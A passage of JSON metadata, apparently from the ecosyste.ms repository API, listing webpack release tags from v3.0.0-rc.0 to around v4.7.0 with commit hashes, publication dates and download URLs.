ck%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"}